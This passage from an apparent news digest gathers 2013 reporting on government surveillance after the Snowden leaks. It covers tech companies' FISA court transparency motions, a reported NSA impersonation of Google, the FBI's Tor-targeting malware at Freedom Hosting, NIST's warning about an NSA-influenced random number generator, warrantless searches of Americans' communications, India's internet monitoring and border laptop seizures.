“A public argument would be consistent with this Court’s rules, which state that ‘a hearing in a non-adversarial matter must be ex parte and conducted within the Court’s secure facility, suggesting by negative implication, that a hearing in an adversarial matter shall be open,” the motion says.

On Aug. 29, Director of National Intelligence James Clapper announced that the government would release an annual statement describing the total number of national security orders and the number of targets affected by those orders. Those numbers would include probably cause orders under the Foreign Intelligence Surveillance Act (FISA), in particular Section 702 of the Act, as well as FISA business records and National Security Letters.

Google said Clapper’s announcement did not translate into enough transparency for its users.

“It fails to inform [users] of the true extent of demands placed on Google by the government and in any event, such publication is not a replacement for Google’s right to speak truthfully about the process it receives,” today’s motion said.

Google maintains its position that the allegations the intelligence community has access to user data with or without a warrant are hurting its business.

“Google must respond to such claims with more than generalities,” the motion said. “Moreover, these are matters of significant weight and importance, and transparency is critical to advancing public debate in a thoughtful and democratic manner.”

Today’s amended motions from Google, Yahoo and Facebook came after negotiations between the companies and the government reached an impasse, Google said; the government ordered amended motions be filed by today.

Yahoo, which filed its first transparency report last week, made the same request of the FISA court and urged that the U.S. should lead the world in transparency with regard to respect of civil liberties and human rights.

“We believe that the U.S. Government’s important responsibility to protect public safety can be carried out without precluding Internet companies from sharing the number of national security requests they may receive,” Yahoo General Counsel Ron Bell wrote. “Ultimately, withholding such information breeds mistrust and suspicion—both of the United States and of companies that must comply with government legal directives.”

Facebook General Counsel Colin Stretch echoed Bell’s remarks.

“The actions and statements of the U.S. government have not adequately addressed the concerns of people around the world about whether their information is safe and secure with Internet companies,” he wrote. “We believe there is more information that the public deserves to know, and that would help foster an informed debate about whether government security programs adequately balance privacy interests when attempting to keep the public safe.”

Facebook published its first transparency report on Aug. 27.
http://threatpost.com/google-yahoo-f...a-court/102229





NSA Disguised Itself as Google to Spy, Say Reports

If a recently leaked document is any indication, the US National Security Agency -- or its UK counterpart -- appears to have put on a Google suit to gather intelligence.
Edward Moyer

Here's one of the latest tidbits on the NSA surveillance scandal (which seems to be generating nearly as many blog items as there are phone numbers in the spy agency's data banks).

Earlier this week, Techdirt picked up on a passing mention in a Brazilian news story and a Slate article to point out that the US National Security Agency had apparently impersonated Google on at least one occasion to gather data on people. (Mother Jones subsequently pointed out Techdirt's point-out.)

Brazilian site Fantastico obtained and published a document leaked by Edward Snowden, which diagrams how a "man in the middle attack" involving Google was apparently carried out.

A technique commonly used by hackers, a MITM attack involves using a fake security certificate to pose as a legitimate Web service, bypass browser security settings, and then intercept data that an unsuspecting person is sending to that service. Hackers could, for example, pose as a banking Web site and steal passwords.

The technique is particularly sly because the hackers then use the password to log in to the real banking site and then serve as a "man in the middle," receiving requests from the banking customer, passing them on to the bank site, and then returning requested info to the customer -- all the while collecting data for themselves, with neither the customer nor the bank realizing what's happening. Such attacks can be used against e-mail providers too.

It's not clear if the supposed attack in the Fantastico document was handled by the NSA or by its UK counterpart, the Government Communications Headquarters (GCHQ). The article by the Brazilian news agency says, "In this case, data is rerouted to the NSA central, and then relayed to its destination, without either end noticing."

"There have been rumors of the NSA and others using those kinds of MITM attacks," Mike Masnick writes on Techdirt, "but to have it confirmed that they're doing them against the likes of Google... is a big deal -- and something I would imagine does not make [Google] particularly happy."

Google provided a short statement to Mother Jones reporter Josh Harkinson in response to his questions on the matter: "As for recent reports that the US government has found ways to circumvent our security systems, we have no evidence of any such thing ever occurring. We provide our user data to governments only in accordance with the law." (The company is also trying to win the right to provide more transparency regarding government requests for data on Google users.)

CNET got a "no comment" from the NSA in response to our request for more information.

As TechDirt suggests, an MITM attack on the part of the NSA or GCHQ would hardly be a complete shock. The New York Times reported last week that the NSA has sidestepped common Net encryption methods in a number of ways, including hacking into the servers of private companies to steal encryption keys, collaborating with tech companies to build in back doors, and covertly introducing weaknesses into encryption standards.

It wouldn't be much of a stretch to obtain a fake security certificate to foil the Secure Sockets Layer (SSL) cryptographic protocol that's designed to verify the authenticity of Web sites and ensure secure Net communications.

Indeed, such attacks have been aimed at Google before, including in 2011, when a hacker broke into the systems of DigiNotar -- a Dutch company that issued Web security certificates -- and created more than 500 SSL certificates used to authenticate Web sites.

In any case, the purported NSA/GCHG impersonation of Google inspired a rather clever graphic by Mother Jones, one that might even impress the rather clever Doodlers at Google:
http://news.cnet.com/8301-13578_3-57...y-say-reports/





Yahoo CEO Mayer: We Faced Jail if We Revealed NSA Surveillance Secrets

Mark Zuckerberg joins Mayer in hitting back at critics of tech companies, saying US government did 'bad job' of balancing people's privacy and duty to protect
Dominic Rushe

Yahoo chief Marissa Mayer: 'Releasing classified information is treason and you are incarcerated', she told the TechCrunch disrupt conference. Photograph: Reuters

Marissa Mayer, the CEO of Yahoo, and Mark Zuckerberg of Facebook struck back on Wednesday at critics who have charged tech companies with doing too little to fight off NSA surveillance. Mayer said executives faced jail if they revealed government secrets.

Yahoo and Facebook, along with other tech firms, are pushing for the right to be allowed to publish the number of requests they receive from the spy agency. Companies are forbidden by law to disclose how much data they provide.

During an interview at the Techcrunch Disrupt conference in San Francisco, Mayer was asked why tech companies had not simply decided to tell the public more about what the US surveillance industry was up to. "Releasing classified information is treason and you are incarcerated," she said.

Mayer said she was "proud to be part of an organisation that from the beginning, in 2007, has been sceptical of – and has been scrutinizing – those requests [from the NSA]."

Yahoo has previously unsuccessfully sued the foreign intelligence surveillance (Fisa) court, which provides the legal framework for NSA surveillance. In 2007 it asked to be allowed to publish details of requests it receives from the spy agency. "When you lose and you don't comply, it's treason," said Mayer. "We think it make more sense to work within the system," she said.

Zuckerberg said the government had done a "bad job" of balancing people's privacy and its duty to protect. "Frankly I think the government blew it," he said.

He said after the news broke in the Guardian and the Washington Post about Prism, the government surveillance programme that targets major internet companies: "The government response was, 'Oh don't worry we are not spying on any Americans.' Oh wonderful that's really helpful to companies that are trying to serve people around the world and that's really going to inspire confidence in American internet companies."

"I thought that was really bad," he said. Zuckerberg said Facebook and others were pushing successfully for more transparency. "We are not at the end of this. I wish that the government would be more proactive about communicating. We are not psyched that we had to sue in order to get this and we take it very seriously," he said.

On Monday, executives from Yahoo, Facebook, Google and other tech leaders met the president's group on intelligence and communications, tasked with reviewing the US's intelligence and communications technologies in the wake of the NSA revelations.

The meeting came as Yahoo and Facebook filed suits once more to force the Fisa court to allow them to disclose more information.

In its motion, Yahoo said: "Yahoo has been unable to engage fully in the debate about whether the government has properly used its powers, because the government has placed a prior restraint on Yahoo's speech."

It went on: "Yahoo's inability to respond to news reports has harmed its reputation and has undermined its business not only in the United States but worldwide. Yahoo cannot respond to such reports with mere generalities," the company said.

Microsoft and Google also filed their latest legal briefs on Monday to force the Fisa court to disclose more information.

In a blogpost, Google said it was asking for permission to publish "detailed statistics about the types (if any) of national security requests" it receives under Fisa.

"Given the important public policy issues at stake, we have also asked the court to hold its hearing in open rather than behind closed doors. It's time for more transparency," said Google.
http://www.theguardian.com/technolog...a-surveillance





Senator Asks Cellphone Carriers: What Exactly Do You Share With Government?
Somini Sengupta

Senator Edward J. Markey of Massachusetts sent a letter to eight of the country’s major cell phone carriers asking for details on data requests they received from government agencies.

Last year, Edward J. Markey, then a member of the House of Representatives, asked the country’s major cellphone carriers to disclose how many data requests they received from federal and local law enforcement agencies. More than one million in 2011 alone, they said, revealing for the first time how ubiquitous cellphone records had become in criminal investigations.

Now a member of the Senate, Mr. Markey is asking for this year’s numbers and with more details. What exactly does the government seek from the carriers, he wants to know. How often do they ask for cellphone tower dumps, location data, content of text messages, browsing history and so on. How many of those requests did the companies comply with and how many did they deny and why?

The letter to eight companies, including the largest carriers, AT&T, T-Mobile, and Verizon, was sent Thursday. It comes against the backdrop of mounting revelations about secret surveillance of Americans communications.

Senator Markey’s original request last year documented the fast-growing business of cellphone surveillance. Law enforcement sought a variety of records of cellphone subscribers in the course of routine street crime investigations, emergencies and counter-terrorism operations.

At the time, carriers said they generally sought a search warrant or court order to comply with an law enforcement agency’s request for data. But on certain categories of information, like location data, the law remains vague on whether a search warrant is required.

This time around, in his letter, Senator Markey also sought to know how many times federal officials invoked Sec. 215 of the Patriot Act, which carries a gag order prohibiting recipients to discuss its details.
http://bits.blogs.nytimes.com/2013/0...th-government/





Judge Urges U.S. to Consider Releasing N.S.A. Data on Calls
Scott Shane

A judge on the nation’s intelligence court directed the government on Friday to review for possible public release the court’s classified opinions on the National Security Agency’s practice of collecting logs of Americans’ phone calls.

Judge F. Dennis Saylor IV issued the opinion in a response to a motion filed by the American Civil Liberties Union, saying such a move would add to “an informed debate” about privacy and might even improve the reputation of the Foreign Intelligence Surveillance Court on which he sits.

The ruling was the latest development to show the seismic impact of the disclosures by Edward J. Snowden, the former N.S.A. contractor, on the secrecy that has surrounded both the agency and the court. It came a day after the director of national intelligence, James R. Clapper Jr., said in a speech that Mr. Snowden’s leak of secret documents had set off a “needed” debate.

Judge Saylor of Boston, one of the 11 federal judges who take turns sitting on the court operated under the Foreign Intelligence Surveillance Act, said in his ruling that the publication in June of a court order leaked by Mr. Snowden regarding the phone logs had prompted the government to release a series of related documents and “engendered considerable public interest and debate.”

Among the documents voluntarily made public by the Obama administration since then are two FISA court rulings from 2009 and 2011 that were highly critical of the N.S.A., which the judges said had not only violated the agency’s own rules and the law, but had repeatedly misled them.

Those disclosures ran counter to a longstanding assertion by the court’s critics that it acts as a rubber stamp for the N.S.A. and the F.B.I., since statistics show that it has rarely turned down a request for a government eavesdropping warrant.

Judge Saylor seemed to applaud the fuller picture of the court’s actions from the disclosures to date, saying of the possibility of the release of more declassified rulings that “publication would also assure citizens of the integrity of this court’s proceedings.”

The court was responding to the A.C.L.U.’s request for public release of rulings related to the N.S.A.’s collection of the so-called metadata of virtually all phone calls in the United States — phone numbers, time and duration of calls, but not their content. The collection takes place under a provision of the Patriot Act that allows the government to gather “business records” if they are relevant to a terrorism or foreign intelligence investigation.

Though the intelligence court has continued to approve orders to the telephone companies to turn over the call logs, members of Congress — including Representative Jim Sensenbrenner of Wisconsin, a Republican and an author of the Patriot Act, and Senator Patrick J. Leahy of Vermont, the Democratic chairman of the Judiciary Committee — have said the N.S.A.’s collection goes too far.

Alex Abdo, a staff lawyer with the A.C.L.U.’s national security project, said the ruling showed that the court “has recognized the importance of transparency to the ongoing public debate about the N.S.A.’s spying.” Mr. Abdo added, “For too long, the N.S.A.’s sweeping surveillance of Americans has been shrouded in unjustified secrecy.”

Before Mr. Snowden began his release of documents in June, intelligence officials insisted that any public discussion of N.S.A. programs or the secret court rulings governing them would pose a danger to national security. But the strong public and Congressional response to many of the disclosures has forced the spy agency to shift its stance, and President Obama has directed it to make public as much as possible about its operations and rules.

In response, Mr. Clapper’s office has created a new Web page to make public documents, statements by officials and other explanatory material.

On Thursday, in a talk to intelligence contractors, Mr. Clapper said he thought Mr. Snowden’s leaks had started a valuable discussion. “It’s clear that some of the conversations this has generated, some of the debate, actually needed to happen,” he said, according to The Los Angeles Times. “If there’s a good side to this, maybe that’s it.”

But he denounced Mr. Snowden’s leaks, saying they had damaged national security. “Unfortunately, there is more to come,” he said, referring to the fact that news reports have covered only a small fraction of the tens of thousands of documents Mr. Snowden took.
http://www.nytimes.com/2013/09/14/us...-on-calls.html





FBI Admits It Controlled Tor Servers Behind Mass Malware Attack
Kevin Poulsen

It wasn’t ever seriously in doubt, but the FBI yesterday acknowledged that it secretly took control of Freedom Hosting last July, days before the servers of the largest provider of ultra-anonymous hosting were found to be serving custom malware designed to identify visitors.

Freedom Hosting’s operator, Eric Eoin Marques, had rented the servers from an unnamed commercial hosting provider in France, and paid for them from a bank account in Las Vegas. It’s not clear how the FBI took over the servers in late July, but the bureau was temporarily thwarted when Marques somehow regained access and changed the passwords, briefly locking out the FBI until it gained back control.

The new details emerged in local press reports from a Thursday bail hearing in Dublin, Ireland, where Marques, 28, is fighting extradition to America on charges that Freedom Hosting facilitated child pornography on a massive scale. He was denied bail today for the second time since his arrest in July.

Freedom Hosting was a provider of turnkey “Tor hidden service” sites — special sites, with addresses ending in .onion, that hide their geographic location behind layers of routing, and can be reached only over the Tor anonymity network. Tor hidden services are used by sites that need to evade surveillance or protect users’ privacy to an extraordinary degree – including human rights groups and journalists. But they also appeal to serious criminal elements, child-pornography traders among them.

On August 4, all the sites hosted by Freedom Hosting — some with no connection to child porn — began serving an error message with hidden code embedded in the page. Security researchers dissected the code and found it exploited a security hole in Firefox to identify users of the Tor Browser Bundle, reporting back to a mysterious server in Northern Virginia. The FBI was the obvious suspect, but declined to comment on the incident. The FBI also didn’t respond to inquiries from WIRED today.

But FBI Supervisory Special Agent Brooke Donahue was more forthcoming when he appeared in the Irish court yesterday to bolster the case for keeping Marque behind bars, according to local press reports. Among the many arguments Donahue and an Irish police inspector offered was that Marques might reestablish contact with co-conspirators, and further complicate the FBI probe. In addition to the wrestling match over Freedom Hosting’s servers, Marques allegedly dove for his laptop when the police raided him, in an effort to shut it down.

Donahue also said Marque had been researching the possibility of moving his hosting, and his residence, to Russia. “My suspicion is he was trying to look for a place to reside to make it the most difficult to be extradited to the U.S.,” said Donahue, according to the Irish Independent.

Freedom Hosting has long been notorious for allowing child porn to live on its servers. In 2011, the hactivist collective Anonymous singled out the service for denial-of-service attacks after allegedly finding the firm hosted 95 percent of the child porn hidden services on the Tor network. In the hearing yesterday, Donahue said the service hosted at least 100 child porn sites with thousands of users, and claimed Marques had visited some of the sites himself.

Reached by phone, Marques’ lawyer declined to comment on the case. Marques faces federal charges in Maryland, where the FBI’s child-exploitation unit is based, in a case that is still under seal.

The apparent FBI-malware attack was first noticed on August 4, when all of the hidden service sites hosted by Freedom Hosting began displaying a “Down for Maintenance” message. That included at least some lawful websites, such as the secure email provider TorMail.

Some visitors looking at the source code of the maintenance page realized that it included a hidden iframe tag that loaded a mysterious clump of Javascript code from a Verizon Business internet address. By midday, the code was being circulated and dissected all over the net. Mozilla confirmed the code exploited a critical memory management vulnerability in Firefox that was publicly reported on June 25, and is fixed in the latest version of the browser.

Though many older revisions of Firefox were vulnerable to that bug, the malware only targeted Firefox 17 ESR, the version of Firefox that forms the basis of the Tor Browser Bundle – the easiest, most user-friendly package for using the Tor anonymity network. That made it clear early on that the attack was focused specifically on de-anonymizing Tor users.

Tor Browser Bundle users who installed or manually updated after June 26 were safe from the exploit, according to the Tor Project’s security advisory on the hack.

The payload for the Tor Browser Bundle malware is hidden in a variable called “magneto.”

Perhaps the strongest evidence that the attack was a law enforcement or intelligence operation was the limited functionality of the malware.

The heart of the malicious Javascript was a tiny Windows executable hidden in a variable named “Magneto.” A traditional virus would use that executable to download and install a full-featured backdoor, so the hacker could come in later and steal passwords, enlist the computer in a DDoS botnet, and generally do all the other nasty things that happen to a hacked Windows box.

But the Magneto code didn’t download anything. It looked up the victim’s MAC address — a unique hardware identifier for the computer’s network or Wi-Fi card — and the victim’s Windows hostname. Then it sent it to a server in Northern Virginia server, bypassing Tor, to expose the user’s real IP address, coding the transmission as a standard HTTP web request.

“The attackers spent a reasonable amount of time writing a reliable exploit, and a fairly customized payload, and it doesn’t allow them to download a backdoor or conduct any secondary activity,” said Vlad Tsyrklevich, who reverse-engineered the Magneto code, at the time.

The malware also sent a serial number that likely ties the target to his or her visit to the hacked Freedom Hosting-hosted website.

The official IP allocation records maintained by the American Registry for Internet Numbers show the two Magneto-related IP addresses were part of a ghost block of eight addresses that have no organization listed. Those addresses trace no further than the Verizon Business data center in Ashburn, Virginia, 20 miles northwest of the Capital Beltway.

The code’s behavior, and the command-and-control server’s Virginia placement, is also consistent with what’s known about the FBI’s “computer and internet protocol address verifier,” or CIPAV, the law enforcement spyware first reported by WIRED in 2007.

Court documents and FBI files released under the FOIA have described the CIPAV as software the FBI can deliver through a browser exploit to gather information from the target’s machine and send it to an FBI server in Virginia. The FBI has been using the CIPAV since 2002 against hackers, online sexual predators, extortionists, and others, primarily to identify suspects who are disguising their location using proxy servers or anonymity services, like Tor.

Prior to the Freedom Hosting attack, the code had been used sparingly, which kept it from leaking out and being analyzed.

No date has been set for Marques’ extradition hearings, but it’s not expected to happen until next year.
http://www.wired.com/threatlevel/201...m-hosting-fbi/





Internet Experts Want Security Revamp After NSA Revelations
Joseph Menn

Internet security experts are calling for a campaign to rewrite Web security in the wake of disclosures that the U.S. National Security Agency has developed the capability to break encryption protecting millions of sites.

But they acknowledged the task won't be easy, in part because internet security has relied heavily on brilliant government scientists who now appear suspect to many.

Leading technologists said they felt betrayed that the NSA, which has contributed to some important security standards, was trying to ensure they stayed weak enough that the agency could break them. Some said they were stunned that the government would value its monitoring ability so much that it was willing to reduce everyone's security.

"We had the assumption that they could use their capacity to make weak standards, but that would make everyone in the U.S. insecure," said Johns Hopkins cryptography professor Matthew Green. "We thought they would never be crazy enough to shoot out the ground they were standing on, and now we're not so sure."

The head of the volunteer group in charge of the Internet's fundamental technology rules told Reuters on Saturday that the panel will intensify its work to add encryption to basic Web traffic and to strengthen the so-called secure sockets layer, which guards banking, email and other pages beginning with Https.

"This is one instance of the dangers that we face in the networked age," said Jari Arkko, an Ericsson scientist who chairs the Internet Engineering Task Force. "We have to respond to the new threats."

Other experts likewise responded sharply to media reports based on documents from former NSA contractor Edward Snowden showing the NSA has manipulated standards.

Documents provided to The Guardian, the New York Times and others by Snowden and published on Thursday show that the agency worked to insert vulnerabilities in commercial encryption gear, covertly influence other designs to allow for future entry, and weaken industry-wide standards to the agency's benefit.

In combination with other techniques, those efforts led the NSA to claim internally that it had the ability to access many forms of internet traffic that had been widely believed to be secure, including at least some virtual private networks, which set up secure tunnels on the Internet, and the broad security level of the secure sockets layer Web, used for online banking and the like.

The office of the Director of National Intelligence said Friday that the NSA "would not be doing its job" if it did not try to counter the use of encryption by such adversaries as "terrorists, cybercriminals, human traffickers and others."

Green and others said a great number of security protocols needed to be written "from scratch" without government help.

Vint Cerf, author of the some of the core internet protocols, said that he didn't know whether the NSA had truly wreaked much damage, underscoring the uncertainty in the new reports about what use the NSA has made of its abilities.

"There has long been a tension between the mission to conduct surveillance and the mission to protect communication, and that tension resolved some time ago in favor of protection at least for American communications," Cerf said.

Yet Cerf's employer Google Inc confirmed it is racing to encrypt data flowing between its data centers, a process that was ramped up after Snowden's documents began coming to light in June.

Author Bruce Schneier, one of the most admired figures in modern cryptography, wrote in a Guardian column that the NSA "has undermined a fundamental social contract" and that engineers elsewhere had a "moral duty" to take back the Internet.

RELYING ON NSA FOR HELP

But all those interviewed warned that rewriting Web security would be extremely difficult.

Mike Belshe, a former Google engineer who has spearheaded the IETF drive to encrypt regular Web traffic, said that his plan had been "watered down" in the committee process during the past few years as some companies looked after their own interests more than users.

Another problem is the relatively small number of mathematical experts working outside the NSA.

"A lot of our foundational technologies for securing the Net have come through the government," said researcher Dan Kaminsky, famed for finding a critical flaw in the way users are steered to the website they seek. "They have the best minds in the country, but their advice is now suspect."

Finally, governments around the world, including democracies, are asserting more authority over the Internet, in some cases forbidding the use of virtual private networks.

"As much as I want to say this is a technology problem we can address, if the nation states decide security isn't something we're allowed to have, then we're in trouble," Kaminsky said. "If security is outlawed, only outlaws will have security."

(Editing by Peter Henderson and Eric Walsh)
http://www.reuters.com/article/2013/...98701J20130908





Gov’t Standards Agency “Strongly” Discourages Use of NSA-Influenced Algorithm

NIST: "we are not deliberately... working to undermine or weaken encryption."
Jeff Larson and Justin Elliott

Following revelations about the National Security Agency's (NSA) covert influence on computer security standards, the National Institute of Standards and Technology, or NIST, announced earlier this week it is revisiting some of its encryption standards. But in a little-noticed footnote, NIST went a step further, saying it is "strongly" recommending against even using one of the standards.

The institute sets standards for everything from the time to weights to computer security that are used by the government and widely adopted by industry.

As ProPublica, The New York Times, and The Guardian reported last week, documents provided by Edward Snowden suggest that the NSA has heavily influenced the standard, which has been used around the world. In its statement Tuesday, the NIST acknowledged that the NSA participates in creating cryptography standards "because of its recognized expertise" and because the NIST is required by law to consult with the spy agency. "We are not deliberately, knowingly, working to undermine or weaken encryption," NIST chief Patrick Gallagher said at a public conference Tuesday.

Various versions of Microsoft Windows, including those used in tablets and smartphones, contain implementations of the standard, though the NSA-influenced portion isn't enabled by default. Developers creating applications for the platform must choose to enable it.

The New York Times noted earlier this week that documents provided by Snowden show the spy agency played a crucial role in writing the standard that the NIST is now cautioning against using, which was first published in 2006. The NIST standard describes what is known as an "elliptic curve-based deterministic random bit generator." This bit of computer code is one way to produce random numbers that are the cornerstone of encryption technology used on the Internet. If the numbers generated are not random but in fact predictable, the encryption can be more easily cracked.

The Times reported that the Snowden documents suggest the NSA was involved in creating the number generator. Researchers say the evidence of NSA influence raises questions about whether any of the standards developed by the NIST can be trusted. "NIST's decisions used to be opaque and frustrating," said Matthew Green, a professor at Johns Hopkins University. "Now they're opaque and potentially malicious. Which is too bad because NIST performs such a useful service."

Cryptographers have long suspected the standard in question was faulty. Seven years ago, a pair of researchers in the Netherlands authored a paper that said the random number generator was insecure and that attacks against it could "be run on an ordinary PC." A year after that, in 2007, two Microsoft engineers flagged the standard as potentially containing a backdoor.

Following the criticism, the standard was revised in 2007 to include an optional workaround. The NSA has long been involved in encryption matters at the standards institute. "NIST follows NSA's lead in developing certain cryptographic standards," a 1993 Government Accountability Office report noted. A 2002 law mandates that the NIST set information security standards and lists the NSA merely as one of several other agencies that must be consulted.

Asked how often standards are reopened, NIST spokesperson Gail Porter said, "It's not frequent, but it does happen." She added that it would be "difficult to give you an exact number of times." Asked whether Microsoft would continue to use the encryption standard in some of its software, a spokesperson said the company "is evaluating NIST's recent recommendations and as always, will take the appropriate action to protect our customers." The NSA declined to comment.
http://arstechnica.com/security/2013...tion-standard/





Obama Administration Had Restrictions on NSA Reversed in 2011
Ellen Nakashima

The Obama administration secretly won permission from a surveillance court in 2011 to reverse restrictions on the National Security Agency’s use of intercepted phone calls and e-mails, permitting the agency to search deliberately for Americans’ communications in its massive databases, according to interviews with government officials and recently declassified material.

In addition, the court extended the length of time that the NSA is allowed to retain intercepted U.S. communications from five years to six years — and more under special circumstances, according to the documents, which include a recently released 2011 opinion by U.S. District Judge John D. Bates, then chief judge of the Foreign Intelligence Surveillance Court.

What had not been previously acknowledged is that the court in 2008 imposed an explicit ban — at the government’s request — on those kinds of searches, that officials in 2011 got the court to lift the bar and that the search authority has been used.

Together the permission to search and to keep data longer expanded the NSA’s authority in significant ways without public debate or any specific authority from Congress. The administration’s assurances rely on legalistic definitions of the term “target” that can be at odds with ordinary English usage. The enlarged authority is part of a fundamental shift in the government’s approach to surveillance: collecting first, and protecting Americans’ privacy later.

“The government says, ‘We’re not targeting U.S. persons,’ ” said Gregory T. Nojeim, senior counsel at the Center for Democracy and Technology. “But then they never say, ‘We turn around and deliberately search for Americans’ records in what we took from the wire.’ That, to me, is not so different from targeting Americans at the outset.”

The court decision allowed the NSA “to query the vast majority” of its e-mail and phone call databases using the e-mail addresses and phone numbers of Americans and legal residents without a warrant, according to Bates’s opinion.

The queries must be “reasonably likely to yield foreign intelligence information.” And the results are subject to the NSA’s privacy rules.

The court in 2008 imposed a wholesale ban on such searches at the government’s request, said Alex Joel, civil liberties protection officer at the Office of the Director of National Intelligence (ODNI). The government included this restriction “to remain consistent with NSA policies and procedures that NSA applied to other authorized collection activities,” he said.

But in 2011, to more rapidly and effectively identify relevant foreign intelligence communications, “we did ask the court” to lift the ban, ODNI general counsel Robert S. Litt said in an interview. “We wanted to be able to do it,” he said, referring to the searching of Americans’ communications without a warrant.

Joel gave hypothetical examples of why the authority was needed, such as when the NSA learns of a rapidly developing terrorist plot and suspects that a U.S. person may be a conspirator. Searching for communications to, from or about that person can help assess that person’s involvement and whether he is in touch with terrorists who are surveillance targets, he said. Officials would not say how many searches have been conducted.

The court’s expansion of authority went largely unnoticed when the opinion was released, but it formed the basis for cryptic warnings last year by a pair of Democratic senators, Ron Wyden (Ore.) and Mark Udall (Colo.), that the administration had a “back-door search loophole” that enabled the NSA to scour intercepted communications for those of Americans. They introduced legislation to require a warrant, but they were barred by classification rules from disclosing the court’s authorization or whether the NSA was already conducting such searches.

“The [surveillance] Court documents declassified recently show that in late 2011 the court authorized the NSA to conduct warrantless searches of individual Americans’ communications using an authority intended to target only foreigners,” Wyden said in a statement to The Washington Post. “Our intelligence agencies need the authority to target the communications of foreigners, but for government agencies to deliberately read the e-mails or listen to the phone calls of individual Americans, the Constitution requires a warrant.”

Senior administration officials disagree. “If we’re validly targeting foreigners and we happen to collect communications of Americans, we don’t have to close our eyes to that,” Litt said. “I’m not aware of other situations where once we have lawfully collected information, we have to go back and get a warrant to look at the information we’ve already collected.”

The searches take place under a surveillance program Congress authorized in 2008 under Section 702 of the Foreign Intelligence Surveillance Act. Under that law, the target must be a foreigner “reasonably believed” to be outside the United States, and the court must approve the targeting procedures in an order good for one year.

But — and this was the nub of the criticism — a warrant for each target would no longer be required. That means that communications with Americans could be picked up without a court first determining that there is probable cause that the people they were talking to were terrorists, spies or “foreign powers.”

That is why it is important to require a warrant before searching for Americans’ data, Udall said. “Our founders laid out a roadmap where Americans’ privacy rights are protected before their communications are seized or searched — not after the fact,” he said in a statement to The Post.

Another change approved by Bates allows the agency to keep the e-mails of or concerning Americans for up to six years, with an extension possible for foreign intelligence or counterintelligence purposes. Because the retention period begins “from the expiration date” of the one-year surveillance period, the court effectively added up to one year of shelf life for the e-mails collected at the beginning of the period.

Joel said that the change was intended to standardize retention periods across the agencies and that the more generous standard was “already in use” by another agency.

The NSA intercepts more than 250 million Internet communications each year under Section 702. Ninety-one percent are from U.S. Internet companies such as Google and Yahoo. The rest come from “upstream” companies that route Internet traffic to, from and within the United States. The expanded search authority applies only to the downstream collection.

Barton Gellman contributed to this report.
http://www.washingtonpost.com/world/...fd5_story.html





India Govt Reportedly Monitors Web Activities, Without ISP Knowledge

Summary: Indian government said to have deployed Lawful Intercept and Monitoring systems to track Internet activities of citizens, separate from similar systems used by telcos in the government's Central Monitoring System project.
Ellyne Phneah

The Lawful Intercept and Monitoring system, reportedly installed by the government, is separate from similar systems currently used by local telcos.

The Indian government is reportedly carrying out Internet surveillance on its citizens, in contrast with the government's rules and notifications for ensuring communications privacy.

According to an investigation by Chennai-based publication The Hindu, Lawful Intercept and Monitoring (LIM) systems have been deployed by the country's Center for Development of Telematics (D-DOT) to monitor Internet traffic, e-mails, Web browsing, Skype and other Internet activities by Indian citizens.

The systems are fully owned and operated by the Indian government, unlike similar systems deployed by local Internet Service Providers (ISPs) which have to comply with Indian Telegraph Act and Rule 419(A) of the country's IT rules, the publication reported on Monday.

The paper also said in 2006, the government released "instructions for ensuring privacy of communications", which stated ISPs have to employ "nodal officers" to regularly liaise with the authorities on interception requests. However, in reality, few ISPs have such staff and LIMs are operated without any consultation with them in any case.

The LIMs are said to be installed between the edge router and core network, and have 100 percent indiscriminate access to the online activity of the country's 160 million users. It also has an "always live" link so it can be operated without legal oversight of ISP knowledge.

Authorities are hence, able to monitor not just through e-mail addresses, URL or IP addresses, but through broad keyword or text searches. Nine security agencies, including the Intelligence Bureau (IB) and the Research and Analysis Wing (RAW) are reportedly involved.

This comes amid the launch of the Indian government's Central Monitoring System (CMS) project, which intercepts phone and internet data, commenced limited operations in April this year. The CMS was conceived last December after India's Income Tax Department taped the phone conversations of Niira Radia, a politicial lobbyist, with several senior journalists, politicians, and corporate houses over 300 days between 2008 and 2009.
http://www.zdnet.com/in/india-govt-r...ge-7000020396/





New Details in How the Feds Take Laptops at Border
AP

Newly disclosed U.S. government files provide an inside look at the Homeland Security Department's practice of seizing and searching electronic devices at the border without showing reasonable suspicion of a crime or getting a judge's approval.

The documents published Monday describe the case of David House, a young computer programmer in Boston who had befriended Army Pvt. Chelsea Manning, the soldier convicted of giving classified documents to WikiLeaks. U.S. agents quietly waited for months for House to leave the country then seized his laptop, thumb drive, digital camera and cellphone when he re-entered the United States. They held his laptop for weeks before returning it, acknowledging one year later that House had committed no crime and promising to destroy copies the government made of House's personal data.

The government turned over the federal records to House as part of a legal settlement agreement after a two-year court battle with the American Civil Liberties Union, which had sued the government on House's behalf. The ACLU said the records suggest that federal investigators are using border crossings to investigate U.S. citizens in ways that would otherwise violate the Fourth Amendment.

The Homeland Security Department declined to discuss the case.

House said he was 22 when he first met Manning, who now is serving a 35-year sentence for one of the biggest intelligence leaks in U.S. history. It was a brief, uneventful encounter at a January 2010 computer science event. But when Manning was arrested later that June, that nearly forgotten handshake came to mind. House, another tech enthusiast, considered Manning a bright, young, tech-savvy person who was trying to stand up to the U.S. government and expose what he believed were wrongheaded politics.

House volunteered with friends to set up an advocacy group they called the Bradley Manning Support Network, and he went to prison to visit Manning, formerly known as Bradley Manning.

It was that summer that House quietly landed on a government watchlist used by immigrations and customs agents at the border. His file noted that the government was on the lookout for a second batch of classified documents Manning had reportedly shared with the group WikiLeaks but hadn't made public yet. Border agents were told that House was "wanted for questioning" regarding the "leak of classified material." They were given explicit instructions: If House attempted to cross the U.S. border, "secure digital media," and "ID all companions."

But if House had been wanted for questioning, why hadn't federal agents gone back to his home in Boston? House said the Army, State Department and FBI had already interviewed him.

Instead, investigators monitored passenger flight records and waited for House to leave the country that November for a Mexico vacation with his girlfriend. When he returned, two agents were waiting for him, including one who specialized in computer forensics. They seized House's laptop and detained his computer for seven weeks, giving the government enough time to try to copy every file and keystroke House had made since declaring himself a Manning supporter.

President Barack Obama and his predecessors have maintained that people crossing into U.S. territory aren't protected by the Fourth Amendment. That policy is intended to allow for intrusive searches that keep drugs, child pornography and other illegal imports out of the country. But it also means the government can target travelers for no reason other than political advocacy if it wants, and obtain electronic documents identifying fellow supporters.

House and the ACLU are hoping his case will draw attention to the issue, and show how searching a suitcase is different than searching a computer.

"It was pretty clear to me I was being targeted for my visits to Manning (in prison) and my support for him," said House, in an interview last week.

How Americans end up getting their laptops searched at the border still isn't entirely clear.

The Homeland Security Department said it should be able to act on a hunch if someone seems suspicious. But agents also rely on a massive government-wide system called TECS, named after its predecessor the Treasury Enforcement Communications System.

